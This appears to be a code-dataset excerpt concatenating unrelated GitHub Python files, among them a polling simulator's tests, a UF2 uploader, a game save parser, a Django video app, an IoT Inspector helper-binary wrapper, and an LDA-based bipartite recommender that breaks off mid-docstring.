# 3. 索引区 中每条记录的格式为"<手机号前七位><记录区的偏移><卡类型>",每个索引的长度为9个字节;
with open(self.out_file, "wb") as FILE:
# pack data
# 记录数据多条重复, 合并记录区
data_buffer = b''
index_offset = self.head_fmt_length
for key, value in self.tableData.items():
# 计算索引offset
self.tableData[key] = index_offset
index_offset = index_offset + len(key)
# 组合记录区数据
data_buffer += struct.pack(str(len(key)) + "s", key)
# 设置索引offset
self.first_index_offset = index_offset
# pack header
header_buffer = struct.pack(self.head_fmt, self.dat_version.encode('utf-8'), self.first_index_offset)
# write buffer
FILE.write(header_buffer)
FILE.write(data_buffer)
# pack index
for key, value in self.table.items():
data_offset = self.tableData[value["data"]]
index_buffer = struct.pack(self.phone_fmt, value["no"], data_offset, value["carrier"])
FILE.write(index_buffer)
def version(self):
print("Version: {}".format(self.dat_version))
print("File: {}".format(self.out_file))
print("Size: {}".format(os.path.getsize(self.out_file)))
print("Count: {}".format(self.phone_record_count))
def cmdline_parser():
defaultVersion = datetime.now().strftime('%y%m')
parser = argparse.ArgumentParser(description=u'PackMe: 生成phone.dat数据文件')
parser.add_argument('-i', '--input', metavar=u'file', help=u'csv源文件路径', required=True)
parser.add_argument('-o', '--output', metavar=u'file', help=u'生成phone.dat数据文件路径',
default="phone.{}.dat".format(defaultVersion), required=False)
parser.add_argument('-v', '--version', metavar=u'2010', help=u'版本号', type=int,
default=defaultVersion, required=False)
return parser
def main():
parser = cmdline_parser()
args = parser.parse_args()
pp = DataConverter(args.input, args.output, args.version)
pp.pack()
pp.version()
if __name__ == '__main__':
main()
``` |
{
"source": "2039/polling_simulator",
"score": 3
} |
#### File: 2039/polling_simulator/test.py
```python
import argparse
import unittest
from random import seed
from polling import poll, votes, Population, Tally, sigma
from collections import Counter
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--test", default=[], type=int, nargs="*", help="Run given tests.")
parser.add_argument("-s", "--seed", default=0, type=int, help="Set seed.")
options = parser.parse_args()
# ===
class Test_Population(unittest.TestCase):
def setUp(self):
self.pop_dict = {
"a" : 10,
"b" : 20,
"c" : 30,
}
self.empty = Population({})
self.pop = Population(self.pop_dict)
def test_weights(self):
self.assertEqual(self.empty.weights, ())
self.assertEqual(self.pop.weights, tuple(self.pop_dict.values()))
def test_groups(self):
self.assertEqual(self.empty.groups, ())
self.assertEqual(self.pop.groups, tuple(self.pop_dict.keys()))
def test_size(self):
self.assertEqual(self.empty.size, 0)
self.assertEqual(self.pop.size, 60)
def test_len(self):
self.assertEqual(len(self.empty), 0)
self.assertEqual(len(self.pop), 3)
def test_vars(self):
self.assertEqual(vars(self.empty), {})
self.assertEqual(vars(self.pop), self.pop_dict)
def test_getter(self):
self.assertEqual(self.pop["a"], 10)
self.assertEqual(self.pop["b"], 20)
self.assertEqual(self.pop["c"], 30)
def test_p(self):
self.assertEqual(self.pop.p("a"), 10/60)
self.assertEqual(self.pop.p("b"), 20/60)
self.assertEqual(self.pop.p("c"), 30/60)
def test_iterable(self):
for g1, g2 in zip(self.pop, self.pop_dict):
self.assertEqual(g1, g2)
def test_contains(self):
for group in self.pop_dict:
group in self.pop
class Test_Voting(unittest.TestCase):
def setUp(self):
seed(options.seed)
self.votes = votes
def test_empty(self):
population = Population(dict())
vote_count = sum(1 for _vote in self.votes(population, 0))
self.assertEqual(vote_count, 0)
def test_sample(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
for vote in self.votes(population, 5):
self.assertIn(vote, population.groups)
class Test_Tallying(unittest.TestCase):
def setUp(self):
seed(options.seed)
self.Tally = Tally
def test_empty(self):
population = Population(dict())
tally_count = sum(1 for _tally in self.Tally(population, 0, 1))
self.assertEqual(tally_count, 0)
def test_sample(self):
population = Population({
"a" : 20,
"b" : 40,
"c" : 60,
})
N, n = 74, 3
tallies = list(self.Tally(population, N, n))
counts = [sum(tally.values()) for tally in tallies]
self.assertEqual(counts, [25, 25, 24])
self.assertEqual(len(tallies), n)
class Test_Poll_With_Replacement(unittest.TestCase):
def setUp(self):
seed(options.seed)
from functools import partial
self.poll = partial(poll, without_replacement=False)
def test_empty(self):
population = Population(dict())
self.assertEqual(self.poll(population, 0), Counter())
def test_poll_N(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
for N in (3, 7, 31):
polling = self.poll(population, N)
votes = sum(polling.values())
self.assertEqual(votes, N)
def test_uniqueness(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
poll1 = self.poll(population, 15)
poll2 = self.poll(population, 15)
# Probabilistic test
self.assertNotEqual(poll1, poll2)
def test_poll_all(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
N = sum(population.weights)
polling = self.poll(population, N)
# Probabilistic test
self.assertNotEqual(polling, Counter(vars(population)))
self.assertEqual(polling.keys(), vars(population).keys())
class Test_Poll_Without_Replacement(unittest.TestCase):
def setUp(self):
seed(options.seed)
from functools import partial
self.poll = partial(poll, without_replacement=True)
def test_empty(self):
population = Population(dict())
self.assertEqual(self.poll(population, 0), Counter())
def test_poll_N(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
for N in (3, 7, 31):
polling = self.poll(population, N)
votes = sum(polling.values())
self.assertEqual(votes, N)
def test_uniqueness(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
poll1 = self.poll(population, 15)
poll2 = self.poll(population, 15)
# Probabilistic test
self.assertNotEqual(poll1, poll2)
def test_poll_all(self):
population = Population({
"a" : 10,
"b" : 20,
"c" : 30,
})
N = sum(population.weights)
polling = poll(population, N, without_replacement=True)
self.assertEqual(polling, Counter(vars(population)))
class Test_Variance(unittest.TestCase):
def test_simple(self):
args_result = {
(0.0,) : 0.0,
(0.1,) : 0.30000000000000004,
(0.3,) : 0.458257569495584,
(0.5,) : 0.5,
(1.0,) : 0.0,
}
for args, result in args_result.items():
self.assertEqual(sigma(*args), result)
def test_multiple(self):
args_result = {
(0.0, 1) : 0.0,
(0.1, 3) : 0.17320508075688773,
(0.3, 20) : 0.10246950765959598,
(0.5, 90) : 0.05270462766947299,
(1.0, 999) : 0.0,
}
for args, result in args_result.items():
self.assertEqual(sigma(*args), result)
def test_fpc(self):
args_result = {
(0.0, 1, 20) : 0.0,
(0.1, 3, 20) : 0.16383560438182507,
(0.3, 20, 20) : 0.0,
(0.5, 90, 100) : 0.0167506302543202,
(1.0, 999, 1000) : 0.0,
}
for args, result in args_result.items():
self.assertEqual(sigma(*args), result)
tests = [
Test_Population,
Test_Voting,
Test_Tallying,
Test_Poll_With_Replacement,
Test_Poll_Without_Replacement,
Test_Variance,
]
tests = [tests[t-1] for t in options.test]
runner = unittest.TextTestRunner()
for test in tests:
test_suite = unittest.defaultTestLoader.loadTestsFromTestCase(test)
result = runner.run(test_suite)
``` |
{
"source": "203Electronics/UF2-Upload",
"score": 3
} |
#### File: 203Electronics/UF2-Upload/uf2upload.py
```python
import shutil
import re
import argparse
from os.path import exists
import sys
try:
import psutil
except:
print("psutil not installed, run \"pip install psutil\"")
sys.exit(1)
print("UF2-Upload V1.0\nCopyright 2022 203 Electronics.\n");
parser = argparse.ArgumentParser(description='Host utilts for UF2 Bootloader Devices - 203 Electronics, 2022')
parser.add_argument('-f', metavar='<file path>', type=ascii,
help='UF2 file to upload to target')
parser.add_argument('-d', metavar='<device name>', type=ascii,
help='Target UF2 Device name (Model in INFO_UF2.TXT)')
parser.add_argument('-r', action='store_true',
help='Repeat upload for matched UF2 devices')
parser.add_argument('-l', action='store_true',
help='List all matched UF2 devices')
args = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
class uf2:
mountpoint = None
info = None
model = None
board_id = None
date = None
def __repr__(self):
return f"UF2(mountpoing='{self.mountpoint}'. info='{self.info}', model='{self.model}', board_id='{self.board_id}', date='{self.date}'"
def get_uf2_drives(name = None):
if name:
name = name.replace("\'", "").replace("\"", "")
drives = list(filter(lambda x: 'removable' in x.opts, psutil.disk_partitions()))
uf2_devices = []
for drive in drives:
if exists(drive.mountpoint + "INFO_UF2.TXT"):
with open(drive.mountpoint + 'INFO_UF2.TXT', "r") as f:
info = f.read()
uf2_device = uf2()
uf2_device.mountpoint = drive.mountpoint
uf2_device.info = info.partition('\n')[0]
uf2_device.model = re.search('(?:Model: )([^\r\n]+)', info).group(1)
uf2_device.board_id = re.search('(?:Board-ID: )([^\r\n]+)', info).group(1)
uf2_device.date = re.search('(?:Date: )([^\r\n]+)', info).group(1)
if(name == None or bool(re.search(name, uf2_device.model))):
uf2_devices.append(uf2_device)
else:
print("INFO_UF2.TXT does not exists")
return uf2_devices
uf2_devices = get_uf2_drives(args.d)
if(args.l):
print(f"{len(uf2_devices)} device(s) detected:")
for index, uf2_device in enumerate(uf2_devices):
print(f"Device #{index + 1}: {uf2_device.model} ({uf2_device.board_id})")
if(args.f):
file = args.f.replace("\'", "").replace("\"", "")
if exists(file) is False:
raise Exception("File does not exist!")
filename = file.split('\\')[-1]
if filename.endswith(".uf2") is False:
raise Exception("File is not an UF2 file!")
for index, uf2_device in enumerate(uf2_devices):
print(f"Uploading {filename} to device {uf2_device.model} ({uf2_device.board_id})...")
try: #UF2 disconnects after uploaded and copy will throw error
shutil.copy2(file, uf2_device.mountpoint)
except:
pass
print("Done Uploading\n")
if(args.r != True):
break
``` |
{
"source": "203lir/FractalProject",
"score": 3
} |
#### File: 203lir/FractalProject/module1.py
```python
import random
import math
import time
import numpy
from PIL import Image
start = time.time()
up = 400
down = 400
#center is the remaining probability
#generates random list of points
pointlist = []
x = 0
y = 32768
for i in range (0, 32768):
where = random.randint(0, 1000)
pointlist.append([x, y])
if where <= down:
y += 6
elif where <= (up+down):
y -= 6
x += 1
framesize = [32768, 65536]
#boxsize is distance from center to edges
def checkboxes(boxsize, pointlist):
#number of boxes which will be created in each direction
xboxnum = int(framesize[0]/(boxsize*2))
yboxnum = int(framesize[1]/(boxsize*2))
boxlist = []
#creates boxes
for i in range (xboxnum):
addtoboxlist = [2*i*boxsize+boxsize]
for j in range (yboxnum):
addtoboxlist.append([2*j*boxsize+boxsize, False])
boxlist.append(addtoboxlist)
#initializes previousx and previousy (purpose of these variables is in a later comment)
previousx = 0
previousy = int(yboxnum/2)
#looks through points, and checks to see if they are in a box
for a in pointlist:
for b in range ((previousx-2), (previousx+3)):
for c in range ((previousy-2), (previousy+3)):
#makes sure nothing weird is happening with b and c
if b >= 0 and b <= xboxnum:
if c >= 1 and c <= yboxnum:
x = boxlist[b][0]
y = boxlist[b][c][0]
#checks if point is in box
if a[0] >= (x-boxsize):
if a[0] <= (x+boxsize):
if a[1] >= (y-boxsize):
if a[1] <= (y+boxsize):
#marks the box the point is in as being "True"
boxlist[b][c][1] = True
break
else:
continue
break
#we know that the next point of the random walk will be near the current point, which means that we only have to check boxes relatively near the current point in order to have checked all boxes possible for the next point to be in; this significantly improves the speed of the program, instead of checking if the point is in every single box
previousx = b
previousy = c
#counts how many boxes there are points in, and returns a list of points to be highlighted
highlightedpointlist = []
counter = 0
for b in boxlist:
for c in b:
if isinstance(c, float):
pass
else:
if c[1] == True:
counter += 1
for i0 in range (int(b[0]-boxsize), int(b[0]+boxsize)):
for i1 in range (int(c[0]-boxsize), int(c[0]+boxsize)):
highlightedpointlist.append([i0, i1])
return [counter, highlightedpointlist]
#creates image
def createimage (pointlist, highlightedpointlist, name):
MyImg = Image.new('RGB', (1024, 2048), "white")
pixels = MyImg.load()
scaledpointlist = []
#cuts off most of the data, since otherwise the image would be huge and unusable
for n in pointlist:
if n[0] < 1024:
scaledpointlist.append([n[0], n[1]-31744])
for b in numberofboxestouched[1]:
if b[1] > 31744 and b[1] < 33792:
if b[0] < 1024:
pixels[b[0], b[1]-31744] = (250, 200, 21)
for a in scaledpointlist:
pixels[a[0], a[1]] = (0, 0, 0)
imagename = name + ".jpg"
MyImg.save(imagename, quality=95)
#delogged data to analyze
boxnumlist = []
for i in range (9, 13):
boxsize = 32768/(2**i)
#we take log base 2 of all the numbers, then do a linear regression, in order to find an exponential regression of the data as a whole
#this means that we can just use i as the x axis, instead of messing around with exponents and logs here
boxscale = i
numberofboxestouched = checkboxes(boxsize, pointlist)
createimage(pointlist, numberofboxestouched[1], str(i-9))
boxnumlist.append([boxscale, math.log2(numberofboxestouched[0])])
#linear regression on delogged data
#see Griswold's notes on linear regression
#this part of the code finds the SSR, and creates the first quadratic equation
linearTerm = 0
aCoefficient = 0
bCoefficient = 0
abCoefficient = 0
a2Coefficient = 0
b2Coefficient = 0
for i in boxnumlist:
x = i[0]
y = i[1]
linearTerm += y**2
aCoefficient += 2*(-x)*y
bCoefficient += 2*(-y)
abCoefficient += 2*x
a2Coefficient += x**2
b2Coefficient += 1
#solve with a variable, b constant
aCoefficient1 = 2*a2Coefficient
bCoefficient1 = abCoefficient
linearTerm1 = -aCoefficient
#solve with b variable, a constant
aCoefficient2 = abCoefficient
bCoefficient2 = 2*b2Coefficient
linearTerm2 = -bCoefficient
#solve system of equations
LCM = numpy.lcm(aCoefficient1, aCoefficient2)
aMultiplier1 = LCM/aCoefficient1
aMultiplier2 = LCM/aCoefficient2
newBCoefficient1 = bCoefficient1*aMultiplier1
newBCoefficient2 = bCoefficient2*aMultiplier2
newLinearTerm1 = linearTerm1*aMultiplier1
newLinearTerm2 = linearTerm2*aMultiplier2
newereBCoefficient = newBCoefficient1-newBCoefficient2
newerLinearTerm = newLinearTerm1-newLinearTerm2
b = newerLinearTerm/newereBCoefficient
extranewLinearTerm1 = bCoefficient1*b
extranewACoefficient = aCoefficient1
extranewLinearTerm2 = linearTerm1
a = (extranewLinearTerm2-extranewLinearTerm1)/extranewACoefficient
print("Fractal dimension: ", a)
print(boxnumlist)
print("Time taken: ", time.time()-start)
``` |
{
"source": "203Null/Gravity-Rush-2-Save-Loader",
"score": 3
} |
#### File: 203Null/Gravity-Rush-2-Save-Loader/GR2-Save-Loader.py
```python
import struct
import json
from collections import OrderedDict
file_path = "data0002.bin"
show_offset = True
show_hash = False
loaded_data = 0
def unpack(upstream_data_set):
global loaded_data
loaded_data = loaded_data + 1
currentCursor = file.tell()
print(hex(file.tell()))
file.seek(int.from_bytes(file.read(4), byteorder='little'), 0)
variable_name = file.read(200).split(b'\x00')[0].decode('UTF8') #Use UTF8 because some strings are in Japanese
print(hex(file.tell()))
print(variable_name)
file.seek(currentCursor + 4, 0)
type = int.from_bytes(file.read(4), byteorder='little')
data_location = file.tell()
if type == 0x08: # List
list_length = int.from_bytes(file.read(4), byteorder='little')
name_hash = file.read(4).hex()
data_location = file.tell()
value = {}
for i in range(0, list_length):
unpack(value)
value = OrderedDict(sorted(value.items()))
else:
if type % 0x10 == 0x0b: # String
string_length = int.from_bytes(file.read(4), byteorder='little') - 1
data_location = type // 0x10
file.seek(data_location, 0)
try:
value = file.read(string_length).decode('UTF8')
except:
value = "ERROR EXTRACTING STRING"
file.seek(currentCursor + 0x0c, 0)
elif type == 0x09: # Float
value = struct.unpack('f', file.read(4))[0]
elif type == 0x0C: # Boolean
value = int.from_bytes(file.read(1), byteorder='little') > 0
file.seek(3, 1)
else:
value = file.read(4).hex()
print("Warring!!! Unknow type!!! %s at %s with value %s" % (hex(type), hex(file.tell()-8), value))
print()
name_hash = file.read(4).hex()
if variable_name == None:
variable_name = hex(data_location)
else:
if show_hash:
variable_name = variable_name = "%s %s" % (variable_name, name_hash)
if show_offset:
variable_name = variable_name = "%s %s" % (variable_name, hex(data_location))
print(value)
upstream_data_set[variable_name] = value
file = open(file_path, mode='rb')
data = file.read()
data_set = OrderedDict()
if len(data) > 0x40 and data[0:4] == b'ggdL':
file.seek(0x0c, 0)
numOfData = int.from_bytes(file.read(4), byteorder='little')
while loaded_data < numOfData:
unpack(data_set)
print()
print(data_set)
print()
print("Complete with %i/%i data" % (loaded_data, numOfData))
with open(r"%s.txt" % (file_path.split('.')[0]), 'w', encoding='utf-8') as json_file:
json.dump(data_set, json_file, indent=4, ensure_ascii=False)
else:
print("File Incorrect")
``` |
{
"source": "203Null/kthread",
"score": 2
} |
#### File: 203Null/kthread/setup.py
```python
import setuptools
import setuptools.command.test
class NoseTestCommand(setuptools.command.test.test):
def finalize_options(self):
setuptools.command.test.test.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import nose
nose.run_exit(argv=["nosetests"])
with open("README.md", "r") as fd:
long_description = fd.read()
setuptools.setup(
name="kthread",
version="0.2.2",
author="<NAME>",
author_email="<EMAIL>",
description="Killable threads in Python!",
long_description=long_description,
long_description_content_type="text/markdown",
keywords="threading threads terminate",
url="https://github.com/munshigroup/kthread",
packages=setuptools.find_packages(exclude=["tests"]),
tests_require=["nose"],
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
cmdclass={"test": NoseTestCommand},
)
``` |
{
"source": "2044smile/Djtube",
"score": 2
} |
#### File: posts/models/post.py
```python
from django.db import models
from users.models import User
class Post(models.Model):
user = models.ForeignKey(
User,
on_delete=models.CASCADE
)
video_id = models.CharField(
max_length=16,
)
video_original_title = models.CharField(
max_length=256,
blank=True,
null=True,
)
title = models.CharField(
max_length=256,
)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def get_youtube_original_url(self):
return "https://www.youtube.com/watch?v={post_video_id}".format(
post_video_id=self.video_id
)
youtube_original_url = property(get_youtube_original_url)
def get_youtube_embed_url(self):
return "https://www.youtube.com/embed/{video_id}".format(
video_id=self.video_id,
)
youtube_embed_url = property(get_youtube_embed_url())
def __str__(self):
return self.title
```
#### File: users/views/signup.py
```python
from django.conf import settings
from django.contrib import messages
from django.urls import reverse
from django.views.generic import View
from django.shortcuts import render, redirect
from django.contrib.auth import get_user_model
class SignupView(View):
def get(self, request, *args, **kwargs):
return render(
request,
'users/signup.html',
context={},
)
def post(self, request, *args, **kwargs):
username = request.POST.get('username')
password = request.POST.get('password')
phonenumber = request.POST.get('phonenumber')
# TODO - validations ( username )
user = get_user_model().objects.create_user(
username=username,
password=password,
phonenumber=phonenumber,
)
messages.add_message(
request,
messages.SUCCESS,
settings.SIGNUP_SUCCESS_MESSAGE
)
return redirect(reverse('users:login'))
``` |
{
"source": "2048-Bit/iot-inspector-client",
"score": 3
} |
#### File: iot-inspector-client/v2-src/netdisco.py
```python
import threading
import os
import stat
import utils
import requests
import subprocess
import json
import time
BASE_BINARY_PATH = 'https://github.com/noise-lab/netdisco-python-wrapper/raw/master/release/device_identifier_{os}' # noqa
DOWNLOAD_CHUNK_SIZE = 1024 * 1024
class NetdiscoWrapper(object):
def __init__(self, host_state):
self._host_state = host_state
self._os = utils.get_os()
self._netdisco_path = self._get_netdisco_path()
def start(self):
th = threading.Thread(target=self._start_thread)
th.daemon = True
th.start()
def _start_thread(self):
while True:
if len(self._host_state.get_ip_mac_dict_copy()) > 0:
utils.safe_run(self._run_netdisco)
time.sleep(10)
else:
time.sleep(1)
continue
def _get_netdisco_path(self):
exe_name = 'iot-inspector-netdisco'
return os.path.join(
os.path.expanduser('~'),
'princeton-iot-inspector',
exe_name)
def _download_netdisco_binary(self):
if os.path.isfile(self._netdisco_path):
return
# Download the binary
remote_binary_url = BASE_BINARY_PATH.format(os=self._os)
response = requests.get(remote_binary_url, stream=True)
with open(self._netdisco_path, 'wb') as fp:
for chunk in response.iter_content(chunk_size=DOWNLOAD_CHUNK_SIZE):
fp.write(chunk)
# Make sure the binary is executable
st = os.stat(self._netdisco_path)
os.chmod(self._netdisco_path, st.st_mode | stat.S_IXUSR)
def _run_netdisco(self):
self._download_netdisco_binary()
proc = subprocess.Popen(self._netdisco_path, stdout=subprocess.PIPE)
data = proc.communicate()[0]
for line in data.split('\n'):
self._parse_netdisco_output(line)
def _parse_netdisco_output(self, line):
try:
data = json.loads(line)
except ValueError:
return
if 'version' in data:
return
device_type = data['device']
for device_info in data['info']:
# Find IP
device_ip = device_info['host']
device_info['device_type'] = device_type
# Find MAC based on IP
try:
with self._host_state.lock:
device_mac = self._host_state.ip_mac_dict[device_ip]
except KeyError:
return
# Get device_id based on MAC
device_id = utils.get_device_id(device_mac, self._host_state)
# Submit for upload lter
with self._host_state.lock:
self._host_state.pending_netdisco_dict \
.setdefault(device_id, []).append(device_info)
def test():
n = NetdiscoWrapper(None)
n._download_netdisco_binary()
if __name__ == '__main__':
test()
``` |
{
"source": "204con/webcrawlingpc",
"score": 3
} |
#### File: 204con/webcrawlingpc/Driver.py
```python
import MemoryExpress as me
import Newegg as egg
import PCPartPicker as pcpp
import json
def printData(data):
for i in data:
print(i + ' ' + str(data[i]))
print()
search = input("Enter your desired product: ")
dataMemoryExpress = me.getDataMemoryExpress(search)
dataNewegg = egg.getDataNewegg(search)
dataPCPartPicker = pcpp.getDataPCPartPicker(search)
print('Your input, ' + search + ', returned the following results for the lowest prices: \n')
printData(dataMemoryExpress)
printData(dataNewegg)
printData(dataPCPartPicker)
with open('StorageMemoryExpress.json','w') as file:
json.dump(dataMemoryExpress, file, indent=4, sort_keys=True)
file.close()
with open('StorageNewegg.json','w') as file:
json.dump(dataNewegg, file, indent=4, sort_keys=True)
file.close()
with open('StoragePCPartPicker.json','w') as file:
json.dump(dataPCPartPicker, file, indent=4, sort_keys=True)
file.close()
``` |
{
"source": "2051289v/CardiacArtefactBeamformer",
"score": 3
} |
#### File: 2051289v/CardiacArtefactBeamformer/useful_snippets.py
```python
import numpy as np
# find the smallest difference between the closest events in 2 time series
def findMinDiff(arr,arr2):
minDiffs=[];
for x in arr:
minDiffs.append(min(abs(arr2-x)))
return minDiffs
def trimmean(arr, percent, axis):
n = len(arr)
k = int(round(n*(float(percent)/100)/2))
return np.mean(arr[k+1:n-k], axis=axis)
def find_subset(vec,lowerbound,upperbound):
idx=np.arange(np.argmin(abs(vec-lowerbound)),np.argmin(abs(vec-upperbound))+1)
return idx
``` |
{
"source": "205Consulting/OpenSource",
"score": 3
} |
#### File: OpenSource/bipartite_lda/base_class.py
```python
import networkx as nx
from networkx.algorithms import bipartite
import gensim
import numpy as np
import time
import json
# todo:
# add hyperparameters i.e num_topics, iterations, w/e
'''
class: bpg_recommender
usage: write a new class (i.e, "soundcloud_recommender") that inherits bpg_recommender. overrwrite additional_feature_factory
with whatever extra features you want to specific to your data. call in the init of that new class "initialize"
given the user you want to recommend for (this returns a partition index that the user is in). Use the gather_data method
to gather data.
------ old:
Write a run method for your new class that
loops through self.nodes[partition_index^1], i.e the other partition index, and use the gather data module to gather data. Later,
in your new class, you can make a classifier that uses this data to predict.
'''
### README:
# Requirements: each node in bipartite graph must have str() method
# and that str() method must be unique. needed for gensim (i think).
class bpg_recommender(object):
# b: bipartite graph to run recommendations on
def __init__(self, b, num_clusters = 6):
self.b = b
self.num_clusters = num_clusters
self.nodes_sorted = None
# split the graph into it's two partitions
self.nodes = list(bipartite.sets(b))
self.mappings = []
# NOTE: self.copora[0] consideres each node in self.nodes[0] and makes a bag of songs representation for it's neighbors.
# i.e self.corpora[0] is what we pass into lda when we want to model the nodes in self.nodes[0] as documents and the nodes in self.nodes[1] as "words"
self.corpora, self.dicts = self._get_graph_corpora()
# lda_models[0] would be the lda model where the "documents" are sets of nodes in self.nodes[1]
self.lda_models = self._train_lda_models()
# per_cluster_node_distributions[0] is an array of dicts, each dict mapping id->probability for that cluster index
self.per_cluster_node_distributions = self._find_per_cluster_node_distributions()
self.per_dnode_cluster_distributions = self._find_per_dnode_cluster_distributions()
def print_node(node):
'''
function: print_node
params: node - node to print
notes: users should overwrite this function.
'''
print node
def additional_feature_factory(self, node):
'''
function: additional_feature_factory
params: node - node to get features for
returns: python list of additional features
notes: see feature_factory. users should overrwrite this function.
'''
return []
def feature_factory(self, node):
'''
function: feature_factory
params: node - node to get features for
returns: python list of features for the node
notes: users that inherit bpg_recommender should overrwrite "additional_feature_factory" with
and specific features they have, and then call feature_factory on their nodes
'''
features = []
# append all the base features that we have
for mapping in self.mappings:
features.append(mapping[node])
# append additional, non-agnostic features
features += self.additional_feature_factory(node)
return features
def _find_per_dnode_cluster_distributions(self):
return [self._find_per_dnode_cluster_distribution(0),self._find_per_dnode_cluster_distribution(1)]
def _find_per_dnode_cluster_distribution(self, partition_index):
return None
#todo: not clear if this is something I should pre-compute.. not too hard to get from
# gensim using .inference (as in the code currently)
def _find_per_cluster_node_distributions(self):
return [self._find_per_cluster_node_distribution(0), self._find_per_cluster_node_distribution(1)]
def _find_per_cluster_node_distribution(self, partition_index):
'''
function: _find_per_cluster_node_distribution
params: partition_index - which lda model we're looking at
returns: an num-clusters length array, the ith element a dict representing the ith cluster. that dict
has nodes as keys and probability that that cluster generates that node as values.
notes: this function is essentially because gensim makes it wierd to find these values using their
data structures
'''
dist = []
# iterate through topics
for cluster in range(self.num_clusters):
cluster_dist_dict = {}
# get probability distribution
cluster_dist = self.lda_models[partition_index].state.get_lambda()[cluster]
# normalize to real probability distribution
cluster_dist = cluster_dist / cluster_dist.sum()
for i in range(len(cluster_dist)):
# map the string id of the node to the probability (self.dict goes from gensim's id -> my string id)
cluster_dist_dict[self.dicts[partition_index][i]] = cluster_dist[i]
# append to array of dicts
dist.append(cluster_dist_dict)
return dist
def _get_partition_corpus(self,partition):
'''
function: _get_partition_corpus
params: partition - which partition to get the corpus for
returns: corpus - gensim corpus, each document being the neighbors of a node in our partition
dictionary - gensim dictionary for the above corpus
'''
# build bags of neighbors
bags_of_neighbors = []
for node in partition:
bags_of_neighbors.append(self._node_to_bagofneighbors(node))
# create gensim dictionary
dictionary = gensim.corpora.Dictionary(bags_of_neighbors)
# change to wierd gensim bow format
corpus = [dictionary.doc2bow(bon) for bon in bags_of_neighbors]
return corpus, dictionary
def _get_graph_corpora(self):
# left nodes:
zero_corpus, zero_dict = self._get_partition_corpus(self.nodes[0])
# right nodes:
one_corpus, one_dict = self._get_partition_corpus(self.nodes[1])
return [zero_corpus, one_corpus], [zero_dict, one_dict]
def _train_lda_models(self):
return [self._train_lda_model(0), self._train_lda_model(1)]
def _train_lda_model(self, partition_index):
lda = gensim.models.ldamodel.LdaModel(corpus=self.corpora[partition_index], id2word=self.dicts[partition_index], num_topics=6)
return lda
# self.lda_models[partition_index] = lda
def _check_lda_model(self, partition_index):
if self.lda_models[partition_index] == None:
self._train_lda_model(partition_index)
else:
return
def _node_to_bagofneighbors(self,node):
# currently returns the string of the id's for the neighbors. ***TODO: make __str__ method
return [str(neighbor) for neighbor in self.b.neighbors(node)]
def backwards_LDA_psu(self, node):
'''
function: backwards_LDA_psu
params: node - the node we are recommending for (not the node we want the backwards LDA psu for)
returns: scores - a dict mapping nodes to their backwards LDA psu scores
notes: we want to find argmax_s P(s|u), where u=user s=song. by bayes, argmax_s P(s|u) = argmax_s P(u|s)P(s), the denominator P(u)
being cancelled away. we can find P(u|s) by treating the songs as "generating" users (something like backwards LDA). The generative
story there would be that when a song "generates" a user, i.e when a song is good enough that a user likes it, the way that happens is
first the song appeals to some group, and then the song appeals to some person in that group. P(s) can be treated as uniform to
make recommendations not care about the popularity of the song; else, P(s) could either be estimated by something like playback count,
or could be found from the graph by degree.
'''
# backwards LDA so we take the other partition index (^1); note that "node" is NOT in nodes[partition_index]
partition_index = (self._find_partition_index(node)^1)
#just more or less an assertion, should have been trained in init (was needed for old code)
self._check_lda_model(partition_index)
scores = {}
to_sort = []
for node_to_check in self.nodes[partition_index]:
# find P(t|s) as 'gamma'
bag_rep = self._node_to_bagofneighbors(node_to_check)
gensim_bow = self.dicts[partition_index].doc2bow(bag_rep)
gamma, sstats = self.lda_models[partition_index].inference([gensim_bow])
normalized_gamma = gamma[0]/sum(gamma[0])
# score is sum over t (P(t|s)P(u|t)) = P(u|s) by independence assumptions of LDA. P(t|s) = normalized_gamma[dist_index], P(u|t) = per_cluster_node_dist[part_index][dist_index][str(node)].
# # sum over t:
# score = 0
# for cluster_index in range(len(self.per_cluster_node_distributions[partition_index])):
# #P(t|s):
# p_t_given_s = normalized_gamma[cluster_index]
# # P(u|t):
# p_u_given_t = self.per_cluster_node_distributions[partition_index][cluster_index][str(node)]
# # add to score
# score += p_t_given_s * p_u_given_t
# ____ NOTE: BECAUSE OF 1-NEIGHBOR NODES IN THE GRAPH, NEED TO INCLUDE P(S) PROBABLY ____ ##
score = sum([self.per_cluster_node_distributions[partition_index][dist_index][str(node)]*normalized_gamma[dist_index] for dist_index in range(len(self.per_cluster_node_distributions[partition_index]))]) #
scores[node_to_check] = score
to_sort.append((node_to_check, score))
# sort on highest scores
to_sort.sort(key=lambda x: x[1], reverse=True)
nodes_sorted = [x[0] for x in to_sort]
return scores, nodes_sorted
def _find_partition_index(self, node):
'''
function: _find_partition_index
params: node - node to look for
returns: partition_index: which partition 'node' is in
'''
if node in self.nodes[0]:
partition_index = 0
elif node in self.nodes[1]:
partition_index = 1
else:
raise nx.NetworkXException('The node you are trying to recommend for does not exist in the graph')
return partition_index
def forwards_LDA_psu(self, node):
'''
function: forwards_LDA_psu
params: node - node we are recommending for (not the node we are looking for the score for)
returns: scores - dict mapping nodes to their forwards LDA psu scores
scores_cosine_sim - dict mapping nodes to the cosine similarity between that node's cluster distribution and the original "node"'s cluster distribution
notes: again we look for argmax_s P(s|u), but now we model it more directly by running LDA treating users as generating songs. Then argmax
P(s|u) is simply the most likely song to be generated, which is easily findable by P(t|u)P(s|t). It is unclear to me what the
relationship between recommendation feature #1 and #2 is... should be somewhat similar. Note that we could be more efficient by sampling
for example, rather than iterating and picking the best song (sampling like just going and DOING lda's generative story)
for cosine similarity, we simply find the cluster distribution for our node by running inference on our node's "document" (it's neighbors).
Then, we find the cluster distribution of an arbitrary other node (which is in the other bipartite set) by running inference on
